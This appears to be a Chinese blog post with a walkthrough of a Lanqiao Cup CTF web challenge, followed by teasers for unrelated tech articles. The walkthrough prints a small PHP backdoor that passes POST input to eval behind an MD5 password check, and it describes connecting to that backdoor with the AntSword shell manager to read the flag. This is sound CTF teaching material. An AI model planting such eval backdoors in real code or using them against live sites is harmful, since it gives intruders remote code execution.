蓝桥杯-网络安全比赛题目-遗漏的压缩包

news/2024/11/7 23:04:44/
小蓝同学给你发来了他自己开发的网站链接,
他说他故意留下了一个压缩包文件,里面有网站的源代码,
他想考验一下你的网络安全技能。
(点击“下发赛题”后,你将得到一个http链接。如果该链接自动跳转到https,请手动将其改为http再进行访问。)

题目

  1. 通过扫描工具扫出该网址下有www.zip文件,下载后查看其中的1337.php
    1337.php
<?php
# leet
if(md5($_GET['pwd'])=='217f81b8ff0a1ab138a8e1bdc031262e'){eval($_POST['1337']);
}

可知MD5后的密文要等于’217f81b8ff0a1ab138a8e1bdc031262e’
HACKBOOK
输入密码,通过蚁剑进入SHELL
shell

连接成功
进入根目录,找到flag
flag
flag text
成功夺旗!


http://www.ppmy.cn/news/1545185.html

相关文章

梧桐数据库的窗口函数分析用户页面访问行为

在网站或应用程序分析中&#xff0c;了解用户最常访问哪些页面是至关重要的。这不仅可以帮助我们优化用户体验&#xff0c;还可以为内容策略和产品改进提供洞察。本文将介绍如何使用梧桐数据库的窗口函数来分析用户页面访问数据&#xff0c;并找出每个用户最常访问的页面。 1.…

C# 内存管理与对象生命周期在面向对象设计中的重要性

在面向对象设计&#xff08;OOP&#xff09;中&#xff0c;内存管理和对象生命周期是至关重要的概念。理解这些内容不仅可以帮助提升应用程序的性能&#xff0c;还能使开发者编写出更健壮、更易维护的代码。在本篇文章中&#xff0c;我们将深入探讨 C# 的内存管理机制、对象生命…

redis源码系列--(二)--multi/exec/eval命令执行流程

本文主要记录multi/exec、eval、redis执行lua脚本的源码流程 redis在exec之前&#xff0c;所有queued的命令是没有执行的&#xff0c;&#xff01;&#xff01;&#xff01;在执行时会通过检测client是否被打上CLIENT_DIRTY_CAS标记来判断[watch后,exec时]时间段内是否有key被…

【PHP小课堂】一起学习PHP中的反射(二)

一起学习PHP中的反射&#xff08;二&#xff09; 接下来我们继续 PHP 中的反射相关的功能操作。对于反射操作来说&#xff0c;我们主要是要获取类或者对象中的那些已定义的数据信息&#xff0c;这些信息如果不通过反射的话&#xff0c;正常情况下我们是很难获取到的&#xff0c…

大厂面试真题-如果使用guava limiter实现实例级别的缓存

Guava库中的RateLimiter和Cache是两个不同的组件&#xff0c;分别用于控制访问频率和实现缓存功能。RateLimiter用于流量控制&#xff0c;确保系统在处理请求时不会超过指定的速率&#xff0c;而Cache则用于存储数据以加快访问速度。 由于RateLimiter本身并不直接支持实现缓存…

SpringBoot健身房管理:功能与优势分析

3系统分析 3.1可行性分析 通过对本健身房管理系统实行的目的初步调查和分析&#xff0c;提出可行性方案并对其一一进行论证。我们在这里主要从技术可行性、经济可行性、操作可行性等方面进行分析。 3.1.1技术可行性 本健身房管理系统采用SSM框架&#xff0c;JAVA作为开发语言&a…

使用Visors2导航系统实现目标区域的精准TMS(经颅磁)个体化定位

前言 笔者在进行进行经颅磁刺激(TMS)研究时&#xff0c;想要将元分析得到的目标脑区&#xff08;MNI标准空间中&#xff09;精确定位到被试的个体化T1上&#xff08;原始空间&#xff09;。再基于visor2的TMS仿真导航系统进行干预&#xff0c;在这里分享一下如何基于ANTs配准工…

实验室小车学习使用记录

一、建立基于库函数的工程 在工程文件夹中新建Library文件夹 打开固件库的文件夹&#xff0c;打开Libraries, 主函数main.c中的程序&#xff1a; #include "stm32f10x.h" // Device header #include "delay.h" /*开关1&#xff1a;OF…